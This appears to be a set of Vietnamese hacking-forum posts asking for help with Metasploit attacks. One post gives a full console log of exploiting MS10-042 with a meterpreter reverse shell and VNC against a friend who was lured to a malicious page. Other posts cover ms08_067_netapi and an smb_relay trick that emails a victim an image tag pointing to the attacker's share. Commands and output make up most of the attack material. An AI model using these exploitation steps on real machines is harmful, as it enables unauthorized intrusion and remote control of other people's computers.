|
|
giờ thì cái gì cũng muốn "hack" mà có hiểu hack là gì không? cứ cái gì liên quan tới máy tính, mạng mà người ta không biết không hiểu là họ lại muốn "hack", muốn được chỉ cho "hack".
|
|
|
bebeka wrote:
Em muốn cài Backtrack lên VMware nhưng không làm sao cho VMware nhận được card wireless.Em dùng VMware 7.0 , cài trên hệ điều hành Windows 7.Máy dùng card Intel(R) WifiLink 5100 AGN.
Các Pro có thể chỉ giúp làm sao cho VMware nhận được card wireless không?
bạn có thể thiế lập kết nối mạng ở dạng NAT, máy ảo dùng chung địa chỉ ip với máy thật.
|
|
|
em có một thắc mắc khi ta ghé thăm một website thì tên địa chỉ sẽ được chuyển qua địa chỉ ip của websever và request
rồi kết nối (nếu cho phép) nhưng nếu em lấy trực tiếp địa chỉ ip rồi qua trình duyệt web yêu cầu thì thường không được. cho em hỏi tại sao và nếu như cái websever đó phục vụ cho nhiều website thì chỉ với địa chỉ ip không thể nào xác định được trang web mình muốn vô ?
thanks in advance
|
|
|
mafiaandfbiboy wrote:
thanks bạn nha, thế nếu dính chưởng thì cách tắt nhanh nhất là thế nào?
bạn ơi, nói bạn đừng buồn, bạn nên học có cơ sở hơn đi. nên tìm mấy cuốn về msdos mà đọc chứ cứ hỏi kiểu này mệt lắm.
|
|
|
không hiểu ý bồ lắm. đoán là bạn có thể mở notepad rồi ghi một ròng như thế này :
shutdown -s -c "may tinh cua ban se out trong 10s" -t 10
rồi save file .bat là được
|
|
|
cái này mình cũng không hiểu.
ai có thể giải thích dùm không ?
nhưng bồ dù windows/vncinject/reserve_tcp thì nếu exploit thành công thì vnc sẽ được chạy thay vì cmd.
tài liệu về backtrack thì mình không có nhưng bồ có thể vô : http://www.backtrack-linux.org mọi thứ bồ cần đều có
ở đây
|
|
|
đề nghị bồ trình bày chi tiết hơn. sử dụng exploit nào, payload nào, các khai báo khác ra sao ?
|
|
|
em mới thấy cái này : http://www.exploit-db.com/exploits/15213/
|
|
|
(''); Đợi tool và paper lâu quá rồi !
|
|
|
lovehoaianh wrote:
Cho em hỏi về lỗi này khi dùng Metasploit:
- VMware cài OS Windows SP2.
- Máy tính của em cũng cài Windows SP2 & Metasploit 3.3.
Exploit : Windows/smb/ms08_067_netapi (ms08_067_netapi)
Payload : Windows/shell_bind_tcp
Lhost (theo em hiểu là địa chỉ ip local của mình) : 192.168.1.3
Rhost (ip của máy trong LAN mà mình attack) : 192.168.1.2
Khi chạy báo lỗi STATUS_OBJECT_NAME_NOT_FOUND (Command=162 WordCount=0)
Em tìm mà không biết lỗi này do đâu,xin ý kiến của các anh!
bạn coi thử xem có ping tới được remove không ?
nếu được thử coi lại target coi, thử đặt target auto, cũng từng xảy ra trường hợp bạn phải đặt target là sp3 mặc dù rõ ràng nó là sp3.
có khi chỉ đơn giản là do firewall /* check it
|
|
|
ctm1455 wrote:
Em là một newbies nên còn chicken lắm các pro cho em hỏi cách SET PAYLOAD cho metasploit các phần như LHOST, RHOST em diều hiểu nhưng còn phần SET PAYLOAD thì vẩn chưa hiểu mấy vd : khi muốn sau khi xâm nhập thành công thì sử dụng shell cmd đối với windows phải set payload gì...? smilie ai pro thì giúp em nha
bồ lên chịu khó đọc nhiều hơn. trong hva có nhiều hướng dẫn rõ ràng lắm.
|
|
|
vậy là mình phải tự trả lời câu hỏi của chính mình.javascript:emoticon('');
câjavascript:emoticon('');u trả lời là NAT, phải port-forward javascript:emoticon(''); để router biết phải sử lý thế nào khi có kết nối tới
|
|
|
từ tháng 11/2009 có một 34 vulnerabilities đã được phát hiện nhưng cho tới tận bây giờ các lỗi này mới có bản vá, và cho tới tận bây giờ có rất nhiều máy chưa được fix. trong những lỗi này thì người ta cho rằng MS10-042 và MS10-054 là nguy hiểm nhất. mình xin được trình bày ở đây cách khai thác MS10-042 trong mang lan.
msf > use windows/browser/ms10_042_helpctr_xss_cmd_exec
msf exploit(ms10_042_helpctr_xss_cmd_exec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms10_042_helpctr_xss_cmd_exec) > set lhost 192.168.1.102
lhost => 192.168.1.102
msf exploit(ms10_042_helpctr_xss_cmd_exec) > set rport 4444
rport => 4444
msf exploit(ms10_042_helpctr_xss_cmd_exec) > exploit
[*] Exploit running as background job.
msf exploit(ms10_042_helpctr_xss_cmd_exec) >
[*] Started reverse handler on 192.168.1.102:4444
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.1.102:80/
[*] Server started.
mình dụ thằng bạn cũng trong mạng lan, đăng nhập vô http://192.168.1.102:80/
thế là tóm được nó:
[*] Meterpreter session 1 opened (192.168.1.102:4444 -> 192.168.1.101:1145) at 2010-08-18 19:35:40 +0700
msf exploit(ms10_042_helpctr_xss_cmd_exec) > sessions -L
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter 01-NO1\game-no.1 @ 01-NO1 192.168.1.102:4444 -> 192.168.1.101:1145
msf exploit(ms10_042_helpctr_xss_cmd_exec) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > run vnc
[*] Creating a VNC reverse tcp stager: LHOST=192.168.1.102 LPORT=4545)
[*] Running payload handler
[*] VNC stager executable 73802 bytes long
[*] Uploaded the VNC agent to C:\DOCUME~1\game-no.1\LOCALS~1\Temp\xNyBOCm.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.1.102:4545...
[*] VNC Server session 2 opened (192.168.1.102:4545 -> 192.168.1.101:1146) at 2010-08-18 19:36:39 +0700
vậy là xong.
nhưng nếu ở ngoài mạng lan thì mình không biết. xin mọi người chỉ bảo. thanks
|
|
|
tôi muốn yêu cầu cuốn : metasploit toolkit for penetration testing, exploit development, and vulnerability rearch - by David Maynor and K.K.Môkhey
cảm ơn.
|
|
|
('');
uh, xin lỗi khi đã đưa một tuyên ngôn sai lầm.
('');
mới xong mình đọc một bài hay tuyệt về metasploit trong hva .thanks
nhân tiện: ('');
nhận dịch các tài liệu về metasploit. (''); thêm tài liệu mà. email : 10.0.16.20@gmail.com
ai ở đà lạt liên lạc trực tiếp nhé : 0167.6006.939 ('');
|
|
|
cảm ơn nhiều lám bạn.
uh mình cũng biết nmap chỉ giúp mình xác định các cỏng mở đóng thôi.
i follow what u said
|
|
|
conmale wrote:
vuongphong wrote:
conmale wrote:
Vậy là bồ hiểu rồi đó nhưng việc bồ exploit không thành công có thể máy của victim đã được vá nên exploit trên không còn tác dụng nữa.
liệu mình có thể tìm ra những lỗ hổng chưa được vá trên máy victim bằng nmap không nhỉ ? cho mình vài command đi.
nmap chỉ là port scanner. Nó không phải là tool để tìm lổ hổng bảo mật.
PS: nên tạo chủ đề mới cho thắc mắc mới và nên thử tìm thông tin trên diễn đàn trước khi tạo chủ đề bởi vì những thắc mắc này hầu như đã có người hỏi trước đây.
cùng chung về metasploit mà. mình không thật sự thấy những giải đáp cho thắc mắc của mình trong những trang tài liệu trước. mọi người cùng hỏi hỏi và trao đổi mà với lại có hứng thú gì đâu khi đọc báo cũ.
|
|
|
conmale wrote:
vuongphong wrote:
ok
trước hết mình chạy metasploit, dùng windows/smb/smb_relay, SRVHOST đặt là ip của mình, SRVPORT 445. set payload : PAYLOAD windows/meterpreter/reverse_tcp roi exploit.
msf exploit(smb_relay) > set srvhost 192.168.*.*
srvhost => 192.168.1.105
msf exploit(smb_relay) > set srvhost 445
srvhost => 445
msf exploit(smb_relay) > exploit
tiếp theo mình gửi cho victim email có chèn một tấm hình / . đợi victim mở nó ra và nếu victim có quyền admin trên máy thì remote sẽ được kết nối với máy mình.
mình hiểu vậy có đúng không >
Vậy là bồ hiểu rồi đó nhưng việc bồ exploit không thành công có thể máy của victim đã được vá nên exploit trên không còn tác dụng nữa.
liệu mình có thể tìm ra những lỗ hổng chưa được vá trên máy victim bằng nmap không nhỉ ? cho mình vài command đi.
|
|
|
trong email :<img src="\\myip\Share\pic.jpg">
|
|
|
ok
trước hết mình chạy metasploit, dùng windows/smb/smb_relay, SRVHOST đặt là ip của mình, SRVPORT 445. set payload : PAYLOAD windows/meterpreter/reverse_tcp roi exploit.
msf exploit(smb_relay) > set srvhost 192.168.*.*
srvhost => 192.168.1.105
msf exploit(smb_relay) > set srvhost 445
srvhost => 445
msf exploit(smb_relay) > exploit
tiếp theo mình gửi cho victim email có chèn một tấm hình / . đợi victim mở nó ra và nếu victim có quyền admin trên máy thì remote sẽ được kết nối với máy mình.
mình hiểu vậy có đúng không >
|
|
|
conmale wrote:
vuongphong wrote:
mình muốn hỏi về windows/smb/smb_relay
theo như chi dẫn thì cần tạo a UNC path (\\SERVER\SHARE) into a web page
or email message. khi victim mở chúng ra thì tạo một kết nối nhưng mà mình không thật hiểu. giải thích giùm được không >?
Bồ có thử tìm hiểu qua "smbrelay" là gì chưa?
hiểu sơ sơ thôi
bác có thể miêu tả quá trình không >
|
|
|
mình muốn hỏi về windows/smb/smb_relay
theo như chi dẫn thì cần tạo a UNC path (\\SERVER\SHARE) into a web page
or email message. khi victim mở chúng ra thì tạo một kết nối nhưng mà mình không thật hiểu. giải thích giùm được không >?
|
|
|
conmale wrote:
vuongphong wrote:
minh dung ms08_067_netapi , options deu on ca nhung ma khi exploit thi khong duoc
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Attempting to trigger the vulnerability...
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) >
co ai biet tai sao khong ?
Có lẽ mục tiêu không bị vulnerable hoặc nó được một bộ phận nào đó bảo vệ.
cam on nhe.
nhan tien cho em hoi luon ve windows/smb/smb_relay. khong that su hieu . xin chi no hoat dong nhu the nao ?
thanks
|
|
|
minh dung ms08_067_netapi , options deu on ca nhung ma khi exploit thi khong duoc
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Attempting to trigger the vulnerability...
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) >
co ai biet tai sao khong ?
|
|